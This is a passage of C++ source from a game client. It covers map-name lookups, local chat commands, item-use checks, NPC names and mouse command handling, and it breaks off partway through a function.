	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);

	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if ((cMIresult == DEF_MIRESULT_CLICK) && (iMIbuttonNum == 1))
	{	ChangeGameMode(DEF_GAMEMODE_NULL);
		delete pMI;
		SendMessage(m_hWnd, WM_DESTROY, NULL, NULL);
		return;
	}
	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::DrawVersion(BOOL bAuthor)
{DWORD dwTime = timeGetTime();
 WORD  wR, wG, wB;

	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(140, 140, 140), &wR, &wG, &wB);
	m_pSprite[DEF_SPRID_INTERFACE_ADDINTERFACE]->PutTransSpriteRGB(14, 580, 19, wR, wG, wB, dwTime);
	wsprintf(G_cTxt, "%d", DEF_UPPERVERSION);
	PutString_SprNum(36, 580, G_cTxt, 140, 140, 140);
	m_pSprite[DEF_SPRID_INTERFACE_ADDINTERFACE]->PutTransSpriteRGB(42, 580, 18, wR, wG, wB, dwTime);
	wsprintf(G_cTxt, "%d", DEF_LOWERVERSION);
	PutString_SprNum(46, 580, G_cTxt, 140, 140, 140);
	if (bAuthor == FALSE) return;

}

char CGame::GetOfficialMapName(char * pMapName, char * pName)
{	// MapIndex
	if (strcmp(pMapName, "middleland") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME28);	// Middleland
		return 4;
	}else if (strcmp(pMapName, "huntzone3") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME31);	// Death Valley
		return 0;
	}else if (strcmp(pMapName, "huntzone1") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME29);	// Rocky Highland
		return 1;
	}else if (strcmp(pMapName, "elvuni") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME57);	// Eldiniel Garden
		return 2;
	}else if (strcmp(pMapName, "elvine") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME24);	// Elvine City
		return 3;
	}else if (strcmp(pMapName, "elvfarm") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME2);	// Elvine Farm
		return 5;
	}else if (strcmp(pMapName, "arefarm") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME1);	// Aresden Farm
		return 6;
	}else if (strcmp(pMapName, "default") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME3);	// Beginner Zone
		return 7;
	}else if (strcmp(pMapName, "huntzone4") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME32);	// Silent Wood
		return 8;
	}else if (strcmp(pMapName, "huntzone2") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME30);	// Eternal Field
		return 9;
	}else if (strcmp(pMapName, "areuni") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME56);	// Aresien Garden
		return 10;
	}else if (strcmp(pMapName, "aresden") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME22);	// Aresden City
		return 11;
	}else if (strcmp(pMapName, "dglv2") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME25);	// Dungeon L2
		return 12;
	}else if (strcmp(pMapName, "dglv3") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME26);	// Dungeon L3
		return 13;
	}else if (strcmp(pMapName, "dglv4") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME53);	// Dungeon L4
		return 14;
	}else if (strcmp(pMapName, "elvined1") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME23);	// Elvine Dungeon
		return 15;
	}else if (strcmp(pMapName, "aresdend1") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME21);	// Aresden Dungeon
		return 16;
	}else if (strcmp(pMapName, "bisle") == 0) {
		strcpy(pName, GET_OFFICIAL_MAP_NAME27);	// Bleeding Island
		return 17;
	}else if (strcmp(pMapName, "toh1") == 0) {
		strcpy(pName, GET_OFFICIAL_MAP_NAME60);	// Tower of Hell 1
		return 18;
	}else if (strcmp(pMapName, "toh2") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME61);	// Tower of Hell 2
		return 19;
	}else if (strcmp(pMapName, "toh3") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME62);	// Tower of Hell 3
		return 20;
	}else if (strcmp(pMapName, "middled1x") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME58);	// Middleland Mine
		return 21;
	}else if (strcmp(pMapName, "middled1n") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME59);	// Middleland Dungeon
		return 22;
	}else if (strcmp(pMapName, "2ndmiddle") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME65);	// Promiseland
		return 23;
	}else if (strcmp(pMapName, "icebound") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME66);	// Ice Map
		return 24;
	// Snoopy:
	}else if (strcmp(pMapName, "druncncity") == 0) // Snoopy: Apocalypse maps
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME70);
		return 25;
	}else if (strcmp(pMapName, "inferniaA") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME71);
		return 26;
	}else if (strcmp(pMapName, "inferniaB") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME72);
		return 27;
	}else if (strcmp(pMapName, "maze") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME73);
		return 28;
	}else if (strcmp(pMapName, "procella") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME74);
		return 29;
	}else if (strcmp(pMapName, "abaddon") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME75);
		return 30;
	}else if (strcmp(pMapName, "BtField") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME76);
		return 35;
	}else if (strcmp(pMapName, "GodH") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME77);
		return 36;
	}else if (strcmp(pMapName, "HRampart") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME78);
		return 37;
	}else if (strcmp(pMapName, "cityhall_1") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME35);	// Aresden Cityhall
		return -1;
	}else if (strcmp(pMapName, "cityhall_2") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME36);	// Elvine Cityhall
		return -1;
	}else if (strcmp(pMapName, "gldhall_1") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME37);	// Aresden Guildhall
		return -1;
	}else if (strcmp(pMapName, "gldhall_2") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME38);	// Elvine Guildhall
		return -1;
	}else if (memcmp(pMapName, "bsmith_1", 8) == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME33);	// Aresden Blacksmith
		return -1;
	}else if (memcmp(pMapName, "bsmith_2", 8) == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME34);	// Elvine Blacksmith
		return -1;
	}else if (memcmp(pMapName, "gshop_1", 7) == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME39);	// Aresden Shop
		return -1;
	}else if (memcmp(pMapName, "gshop_2", 7) == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME40);	// Elvine Shop
		return -1;
	}else if (memcmp(pMapName, "wrhus_1", 7) == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME43);	// Aresden Warehouse
		return -1;
	}else if (memcmp(pMapName, "wrhus_2", 7) == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME44);	// Elvine Warehouse
		return -1;
	}else if (strcmp(pMapName, "arewrhus") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME45);	// Aresden Warehouse
		return -1;
	}else if (strcmp(pMapName, "elvwrhus") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME46);	// Elvine Warehouse
		return -1;
	}else if (strcmp(pMapName, "wzdtwr_1") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME41);	// Magic Tower
		return -1;
	}else if (strcmp(pMapName, "wzdtwr_2") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME42);	// Magic Tower
		return -1;
	}else if (strcmp(pMapName, "cath_1") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME47);	// Aresien Church
		return -1;
	}else if (strcmp(pMapName, "cath_2") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME48);	// Eldiniel Church
		return -1;
	}else if (strcmp(pMapName, "resurr1") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME54);	// Revival Zone
		return -1;
	}else if (strcmp(pMapName, "resurr2") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME55);	// Revival Zone
		return -1;
	}else if (strcmp(pMapName, "arebrk11") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME4);	// Aresden Barrack 1
		return -1;
	}else if (strcmp(pMapName, "arebrk12") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME5);	// Aresden Barrack 1
		return -1;
	}else if (strcmp(pMapName, "arebrk21") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME6);	// Aresden Barrack 2
		return -1;
	}else if (strcmp(pMapName, "arebrk22") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME7);	// Aresden Barrack 2
		return -1;
	}else if (strcmp(pMapName, "elvbrk11") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME8);	// Elvine Barrack 1
		return -1;
	}else if (strcmp(pMapName, "elvbrk12") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME9);	// Elvine Barrack 1
		return -1;
	}else if (strcmp(pMapName, "elvbrk21") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME10);	// Elvine Barrack 2
		return -1;
	}else if (strcmp(pMapName, "elvbrk22") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME11);	// Elvine Barrack 2
		return -1;
	}else if (strcmp(pMapName, "fightzone1") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME12);	// Arena 1
		return -1;
	}else if (strcmp(pMapName, "arejail") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME63);	// Aresden Jail
		return -1;
	}else if (strcmp(pMapName, "elvjail") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME64);	// Elvine Jail
		return -1;
	}else if (strcmp(pMapName, "CmdHall_1") == 0) // Snoopy: Commander Halls
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME79);
		return -1;
	}else if (strcmp(pMapName, "CmdHall_2") == 0)
	{	strcpy(pName, GET_OFFICIAL_MAP_NAME79);
		return -1;
	}
	else
	{	strcpy(pName, pMapName);
		return -1;
	}
}

BOOL CGame::bCheckLocalChatCommand(char * pMsg)
{class  CStrTok * pStrTok = NULL;
 char   * token, cBuff[256], cTxt[120], cName[12], cTemp[120];
 char   seps[] = " \t\n";
	ZeroMemory(cBuff, sizeof(cBuff));
	ZeroMemory(cName, sizeof(cName));
	strcpy(cBuff, pMsg);

	if (memcmp(cBuff, "/enabletogglescreen", 19)==0)
	{	m_bToggleScreen = TRUE;
		return TRUE;
	}
	if (memcmp(cBuff, "/whon", 5) == 0)
	{	m_bWhisper = TRUE;
	    AddEventList(BCHECK_LOCAL_CHAT_COMMAND6, 10);// Enable to listen to whispers."
		return TRUE;
	}else if (memcmp(cBuff, "/whoff", 6) == 0)
	{	m_bWhisper = FALSE;
	    AddEventList(BCHECK_LOCAL_CHAT_COMMAND7, 10);//
		return TRUE;
	}else if (memcmp(cBuff, "/shon", 5) == 0)
	{	m_bShout = TRUE;
	    AddEventList(BCHECK_LOCAL_CHAT_COMMAND8, 10); //Enalbe to chat in public."
		return TRUE;
	}else if (memcmp(cBuff, "/shoff", 6) == 0)
	{	m_bShout = FALSE;
	    AddEventList(BCHECK_LOCAL_CHAT_COMMAND9, 10); //Unable to chat in public."
		return TRUE;
	}
	//Bigitems Small o Large by Fenrir
	if (memcmp(cBuff, "/bigitems", 9) == 0)        
	{   if (bChangeBigItems) 
        {	bChangeBigItems = FALSE;
            // DEF_SPRID_ITEMGROUND_PIVOTPOINT+1
            MakeSprite( "item-ground", DEF_SPRID_ITEMGROUND_PIVOTPOINT+1, 19, FALSE);
            m_hPakFile = CreateFile("sprites\\item-ground.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
            if( m_hPakFile != INVALID_HANDLE_VALUE )
            {   m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT+20] = new class CSprite(m_hPakFile, &m_DDraw, "item-ground", 17, FALSE);
                m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT+21] = new class CSprite(m_hPakFile, &m_DDraw, "item-ground", 18, FALSE);
                m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT+22] = new class CSprite(m_hPakFile, &m_DDraw, "item-ground", 19, FALSE);//Angels
                CloseHandle(m_hPakFile);
            }
            AddEventList("Appearance of the items on the ground has been changed to a small.");
        }else 
        {	bChangeBigItems = TRUE;
            // DEF_SPRID_ITEMGROUND_PIVOTPOINT+1
            MakeSprite( "item-pack", DEF_SPRID_ITEMGROUND_PIVOTPOINT+1, 19, FALSE);
            m_hPakFile = CreateFile("sprites\\item-pack.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
            if( m_hPakFile != INVALID_HANDLE_VALUE )
            {   m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT+20] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 17, FALSE);
                m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT+21] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 18, FALSE);
                m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT+22] = new class CSprite(m_hPakFile, &m_DDraw, "item-pack", 19, FALSE);//Angels
                CloseHandle(m_hPakFile);
            }
            AddEventList("Appearance of the items on the ground has been changed to a large.");
        }
        return TRUE;
    }
	if (memcmp(cBuff, "/tooff", 6) == 0)
	{	pStrTok = new class CStrTok(cBuff, seps);
		token = pStrTok->pGet();
		token = pStrTok->pGet();
		if (token != NULL)
		{	if (strlen(token) <= 10)
			{	strcpy(cName, token);
				if (memcmp(m_cPlayerName, cName, 10) == 0)
				{	AddEventList(BCHECK_LOCAL_CHAT_COMMAND2, 10);
					if (pStrTok != NULL) delete pStrTok;
					return TRUE;
				}
				if( m_pExID != NULL ) delete m_pExID;
				wsprintf(cTxt, BCHECK_LOCAL_CHAT_COMMAND3, token);
				AddEventList(cTxt, 10);
				m_pExID = new class CMsg(NULL, token, NULL);
				if (pStrTok != NULL) delete pStrTok;
				return TRUE;
   			}
			else AddEventList(BCHECK_LOCAL_CHAT_COMMAND5, 10);
		}
		if (pStrTok != NULL) delete pStrTok;
		return TRUE;
	}else if (memcmp(cBuff, "/toon", 5) == 0)
	{	pStrTok = new class CStrTok(cBuff, seps);
		token = pStrTok->pGet();
		token = pStrTok->pGet();
		if (token != NULL)
		{	if (strlen(token) <= 10)
			{	strcpy(cName, token);
				if (m_pExID != NULL)
				{	ZeroMemory(cTemp, sizeof(cTemp));
					strcpy(cTemp, m_pExID->m_pMsg);
					if (memcmp(cTemp, cName, 10) == 0)
					{	wsprintf(cTxt, BCHECK_LOCAL_CHAT_COMMAND1, token);
						AddEventList(cTxt, 10);
						delete m_pExID;
						m_pExID = NULL;
						if (pStrTok != NULL) delete pStrTok;
						return TRUE;
				}	}
   			}else AddEventList(BCHECK_LOCAL_CHAT_COMMAND5, 10);
		}
		if (pStrTok != NULL) delete pStrTok;
		return TRUE;
	}
	if (pStrTok != NULL) delete pStrTok;
	return FALSE;
}

BOOL CGame::bCheckItemOperationEnabled(char cItemID)
{
	if (m_pItemList[cItemID] == NULL) return FALSE;
	if (m_cCommand < 0) return FALSE;
	if (m_bIsTeleportRequested == TRUE) return FALSE;
	if (m_bIsItemDisabled[cItemID] == TRUE) return FALSE;

	if ((m_pItemList[cItemID]->m_sSpriteFrame == 155) && (m_bUsingSlate == TRUE))
	{	if ((m_cMapIndex==35)||(m_cMapIndex==36)||(m_cMapIndex==37))
		{	AddEventList(DEF_MSG_NOTIFY_SLATE_WRONG_MAP, 10); // "You cannot use it right here."
			return FALSE;
		}
		AddEventList(DEF_MSG_NOTIFY_SLATE_ALREADYUSING, 10); // Already Using Another Slate
		return FALSE;
	}

	if ( m_bIsDialogEnabled[17] == TRUE )
	{	AddEventList(BCHECK_ITEM_OPERATION_ENABLE1, 10);
		return FALSE;
	}

	if (m_bIsDialogEnabled[20] == TRUE)
	{	AddEventList(BCHECK_ITEM_OPERATION_ENABLE1, 10);
		return FALSE;
	}

	if (m_bIsDialogEnabled[23] == TRUE)
	{	AddEventList(BCHECK_ITEM_OPERATION_ENABLE1, 10);
		return FALSE;
	}

	if (m_bIsDialogEnabled[26] == TRUE)
	{	AddEventList(BCHECK_ITEM_OPERATION_ENABLE1, 10);
		return FALSE;
	}

	if (m_bIsDialogEnabled[27] == TRUE)
	{	AddEventList(BCHECK_ITEM_OPERATION_ENABLE1, 10);
		return FALSE;
	}

	if (m_bIsDialogEnabled[31] == TRUE)
	{	AddEventList(BCHECK_ITEM_OPERATION_ENABLE1, 10);
		return FALSE;
	}

	if (m_bIsDialogEnabled[4] == TRUE)
	{	AddEventList(BCHECK_ITEM_OPERATION_ENABLE1, 10);
		return FALSE;
	}

	return TRUE;
}

void CGame::ClearSkillUsingStatus()
{
	if (m_bSkillUsingStatus == TRUE)
	{	AddEventList(CLEAR_SKILL_USING_STATUS1, 10);//"
		DisableDialogBox(24);
		DisableDialogBox(26);
		if ((m_sPlayerType >= 1) && (m_sPlayerType <= 6)) {
			m_cCommand = DEF_OBJECTSTOP;
			m_sCommX = m_sPlayerX;
			m_sCommY = m_sPlayerY;
		}
	}
	m_bSkillUsingStatus = FALSE;
}

void CGame::GetNpcName(short sType, char *pName)
{
	switch (sType)
	{
	case 10: strcpy(pName, NPC_NAME_SLIME); break;
	case 11: strcpy(pName, NPC_NAME_SKELETON); break;
	case 12: strcpy(pName, NPC_NAME_STONEGOLEM); break;
	case 13: strcpy(pName, NPC_NAME_CYCLOPS); break;
	case 14: strcpy(pName, NPC_NAME_ORC); break;
	case 15: strcpy(pName, NPC_NAME_SHOP_KEEPER); break;
	case 16: strcpy(pName, NPC_NAME_GIANTANT); break;
	case 17: strcpy(pName, NPC_NAME_GIANTSCORPION); break;
	case 18: strcpy(pName, NPC_NAME_ZOMBIE); break;
	case 19: strcpy(pName, NPC_NAME_MAGICIAN); break;
	case 20: strcpy(pName, NPC_NAME_WAREHOUSE_KEEPER); break;
	case 21: strcpy(pName, NPC_NAME_GUARD); break;
	case 22: strcpy(pName, NPC_NAME_SNAKE); break;
	case 23: strcpy(pName, NPC_NAME_CLAYGOLEM); break;
	case 24: strcpy(pName, NPC_NAME_BLACKSMITH_KEEPER); break;
	case 25: strcpy(pName, NPC_NAME_CITYHALL_OFFICER); break;
	case 26: strcpy(pName, NPC_NAME_GUILDHALL_OFFICER); break;
	case 27: strcpy(pName, NPC_NAME_HELHOUND); break;
	case 28: strcpy(pName, NPC_NAME_TROLL); break;
	case 29: strcpy(pName, NPC_NAME_OGRE); break;
	case 30: strcpy(pName, NPC_NAME_LICHE); break;
	case 31: strcpy(pName, NPC_NAME_DEMON); break;
	case 32: strcpy(pName, NPC_NAME_UNICORN); break;
	case 33: strcpy(pName, NPC_NAME_WEREWOLF); break;
	case 34: strcpy(pName, NPC_NAME_DUMMY); break;
	case 35: strcpy(pName, NPC_NAME_ENERGYSPHERE); break;
	case 36:
		if (_tmp_sAppr2 != 0) strcpy(pName, NPC_NAME_ARROWGUARDTOWER_CK);
		else strcpy(pName, NPC_NAME_ARROWGUARDTOWER);
		break;
	case 37:
		if (_tmp_sAppr2 != 0) strcpy(pName, NPC_NAME_CANNONGUARDTOWER_CK);
		else strcpy(pName, NPC_NAME_CANNONGUARDTOWER);
		break;
	case 38:
		if (_tmp_sAppr2 != 0) strcpy(pName, NPC_NAME_MANACOLLECTOR_CK);
		else strcpy(pName, NPC_NAME_MANACOLLECTOR);
		break;
	case 39:
		if (_tmp_sAppr2 != 0) strcpy(pName, NPC_NAME_DETECTOR_CK);
		else strcpy(pName, NPC_NAME_DETECTOR);
		break;
	case 40: strcpy(pName, NPC_NAME_ENERGYSHIELD); break;
	case 41: strcpy(pName, NPC_NAME_GRANDMAGICGENERATOR); break;
	case 42: strcpy(pName, NPC_NAME_MANASTONE); break;
	case 43: strcpy(pName, NPC_NAME_LIGHTWARBEETLE); break;
	case 44: strcpy(pName, NPC_NAME_GODSHANDKNIGHT); break;
	case 45: strcpy(pName, NPC_NAME_GODSHANDKNIGHT_CK); break;
	case 46: strcpy(pName, NPC_NAME_TEMPLEKNIGHT); break;
	case 47: strcpy(pName, NPC_NAME_BATTLEGOLEM); break;
	case 48: strcpy(pName, NPC_NAME_STALKER); break;
	case 49: strcpy(pName, NPC_NAME_HELLCLAW); break;
	case 50: strcpy(pName, NPC_NAME_TIGERWORM); break;
	case 51: strcpy(pName, NPC_NAME_CATAPULT); break;
	case 52: strcpy(pName, NPC_NAME_GARGOYLE); break;
	case 53: strcpy(pName, NPC_NAME_BEHOLDER); break;
	case 54: strcpy(pName, NPC_NAME_DARKELF); break;
	case 55: strcpy(pName, NPC_NAME_RABBIT); break;
	case 56: strcpy(pName, NPC_NAME_CAT); break;
	case 57: strcpy(pName, NPC_NAME_FROG); break;
	case 58: strcpy(pName, NPC_NAME_MOUNTAIN_GIANT); break;
	case 59: strcpy(pName, NPC_NAME_ETTIN); break;
	case 60: strcpy(pName, NPC_NAME_CANNIBAL); break;
	case 61: strcpy(pName, NPC_NAME_RUDOLPH); break;
	case 62: strcpy(pName, NPC_NAME_DIREBOAR); break;
	case 63: strcpy(pName, NPC_NAME_FROST); break;
	case 64:
	{	switch ((_tmp_sAppr2 & 0xFF00) >> 8)	{
	case 1:	strcpy(pName, NPC_NAME_WATERMELON);	break;
	case 2: strcpy(pName, NPC_NAME_PUMPKIN); break;
	case 3: strcpy(pName, NPC_NAME_GARLIC); break;
	case 4: strcpy(pName, NPC_NAME_BARLEY); break;
	case 5:	strcpy(pName, NPC_NAME_CARROT); break;
	case 6: strcpy(pName, NPC_NAME_RADISH); break;
	case 7: strcpy(pName, NPC_NAME_CORN); break;
	case 8: strcpy(pName, NPC_NAME_BFLOWER); break;
	case 9: strcpy(pName, NPC_NAME_MELON); break;
	case 10: strcpy(pName, NPC_NAME_TOMATO); break;
	case 11: strcpy(pName, NPC_NAME_GRAPPE); break;
	case 12: strcpy(pName, NPC_NAME_BLUEGRAPPE); break;
	case 13: strcpy(pName, NPC_NAME_MUSHROM); break;
	case 14: strcpy(pName, NPC_NAME_GINSENG); break;
	default: strcpy(pName, NPC_NAME_CROP); break;
	}
	}
	break;
	case 65: strcpy(pName, NPC_NAME_ICEGOLEM); break;
	case 66: strcpy(pName, NPC_NAME_WYVERN); break;
	case 67: strcpy(pName, NPC_NAME_MCGAFFIN); break;
	case 68: strcpy(pName, NPC_NAME_PERRY); break;
	case 69: strcpy(pName, NPC_NAME_DEVLIN); break;

	case 70: strcpy(pName, NPC_NAME_DRAGON); break;
	case 71: strcpy(pName, NPC_NAME_CENTAUR); break;
	case 72: strcpy(pName, NPC_NAME_CLAWTUR); break;
	case 73: strcpy(pName, NPC_NAME_FIREWYV); break;
	case 74: strcpy(pName, NPC_NAME_GICRAYF); break;
	case 75: strcpy(pName, NPC_NAME_GILIZAR); break;
	case 76: strcpy(pName, NPC_NAME_GITREE); break;
	case 77: strcpy(pName, NPC_NAME_MASTORC); break;
	case 78: strcpy(pName, NPC_NAME_MINAUS); break;
	case 79: strcpy(pName, NPC_NAME_NIZIE); break;

	case 80: strcpy(pName, NPC_NAME_TENTOCL); break;
	case 81: strcpy(pName, NPC_NAME_ABADDON); break;
	case 82: strcpy(pName, NPC_NAME_SORCERS); break;
	case 83: strcpy(pName, NPC_NAME_ATK); break;
	case 84: strcpy(pName, NPC_NAME_MASTELF); break;
	case 85: strcpy(pName, NPC_NAME_DSK); break;
	case 86: strcpy(pName, NPC_NAME_HBT); break;
	case 87: strcpy(pName, NPC_NAME_CT); break;
	case 88: strcpy(pName, NPC_NAME_BARBAR); break;
	case 89: strcpy(pName, NPC_NAME_AGC); break;
	case 90: strcpy(pName, NPC_NAME_GAIL); break;
	case 91: strcpy(pName, NPC_NAME_GATE); break;
	}
}

//50Cent - Capture The Flag
void CGame::DrawFlagCarrier(short sX, short sY, char cFrame, DWORD dwTime)
{
	if ((_tmp_iStatus & 0x80000) != 0) {
		if (m_bAresden)
			m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + 6]->PutSpriteFast(sX, sY - 80, 57, dwTime); // flag
		else m_pSprite[DEF_SPRID_ITEMGROUND_PIVOTPOINT + 6]->PutSpriteFast(sX, sY - 80, 56, dwTime); // flag
	}
}

void CGame::CommandProcessor(short msX, short msY, short indexX, short indexY, char cLB, char cRB)
{
	char   cDir, absX, absY, cName[12];
	short  sX, sY, sObjectType, tX, tY;
	int iObjectStatus;
	int    iRet;
	DWORD  dwTime = timeGetTime();
	WORD   wType = 0;
	int i;
	char   cTxt[120];

	char  pDstName[21];

	short sDstOwnerType;
	int iDstOwnerStatus;

	BOOL  bGORet;
	// Fixed by Snoopy
	if ((m_bIsObserverCommanded == FALSE) && (m_bIsObserverMode == TRUE))
	{
#ifdef RES_HIGH
		if ((msX == 0) && (msY == 0) && (m_sViewDstX > 32 * 26) && (m_sViewDstY > 32 * 21))
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 8, NULL, NULL, NULL, NULL);
		else if ((msX == 799) && (msY == 0) && (m_sViewDstX < 32 * m_pMapData->m_sMapSizeX - 32 * 26) && (m_sViewDstY > 32 * 21))
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 2, NULL, NULL, NULL, NULL);
		else if ((msX == 799) && (msY == 599) && (m_sViewDstX < 32 * m_pMapData->m_sMapSizeX - 32 * 26) && (m_sViewDstY < 32 * m_pMapData->m_sMapSizeY - 32 * 21))
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 4, NULL, NULL, NULL, NULL);
		else if ((msX == 0) && (msY == 599))
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 6, NULL, NULL, NULL, NULL);
		else if ((msX == 0) && (m_sViewDstX > 32 * 26))
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 7, NULL, NULL, NULL, NULL);
		else if ((msX == 799) && (m_sViewDstX < 32 * m_pMapData->m_sMapSizeX - 32 * 26))
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 3, NULL, NULL, NULL, NULL);
		else if ((msY == 0) && (m_sViewDstY > 32 * 21))
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 1, NULL, NULL, NULL, NULL);
		else if ((msY == 599) && (m_sViewDstY < 32 * m_pMapData->m_sMapSizeY - 32 * 21))
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 5, NULL, NULL, NULL, NULL);
		else return;
#else
		if ((msX == 0) && (msY == 0) && (m_sViewDstX > 32 * 21) && (m_sViewDstY > 32 * 16)) 
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 8, NULL, NULL, NULL, NULL);
		else if ((msX == 639) && (msY == 0) && (m_sViewDstX < 32 * m_pMapData->m_sMapSizeX - 32 * 21) && (m_sViewDstY > 32 * 16)) 
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 2, NULL, NULL, NULL, NULL);
		else if ((msX == 639) && (msY == 479) && (m_sViewDstX < 32 * m_pMapData->m_sMapSizeX - 32 * 21) && (m_sViewDstY < 32 * m_pMapData->m_sMapSizeY - 32 * 16)) 
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 4, NULL, NULL, NULL, NULL);
		else if ((msX == 0) && (msY == 479)) 
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 6, NULL, NULL, NULL, NULL);
		else if ((msX == 0) && (m_sViewDstX > 32 * 21)) 
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 7, NULL, NULL, NULL, NULL);
		else if ((msX == 639) && (m_sViewDstX < 32 * m_pMapData->m_sMapSizeX - 32 * 21)) 
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 3, NULL, NULL, NULL, NULL);
		else if ((msY == 0) && (m_sViewDstY > 32 * 16)) 
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 1, NULL, NULL, NULL, NULL);
		else if ((msY == 479) && (m_sViewDstY < 32 * m_pMapData->m_sMapSizeY - 32 * 16)) 
			bSendCommand(MSGID_REQUEST_PANNING, NULL, 5, NULL, NULL, NULL, NULL);
		else return;
#endif
		m_bIsObserverCommanded = TRUE;
		m_cArrowPressed = 0;
		return;
	}

	if (m_bIsObserverMode == TRUE) return;

	if (GetAsyncKeyState(VK_MENU) >> 15) // [ALT]
		m_bSuperAttackMode = TRUE;
	else m_bSuperAttackMode = FALSE;

	switch (m_stMCursor.cPrevStatus) {
	case DEF_CURSORSTATUS_NULL:
		if (cLB != 0)
		{
			iRet = _iCheckDlgBoxFocus(msX, msY, 1);
			if (iRet == 1)
			{
				m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_SELECTED;
				return;
			}
			else if (iRet == 0)
			{
				m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_PRESSED;
				// Snoopy: Added Golden LevelUp
#ifdef RES_HIGH
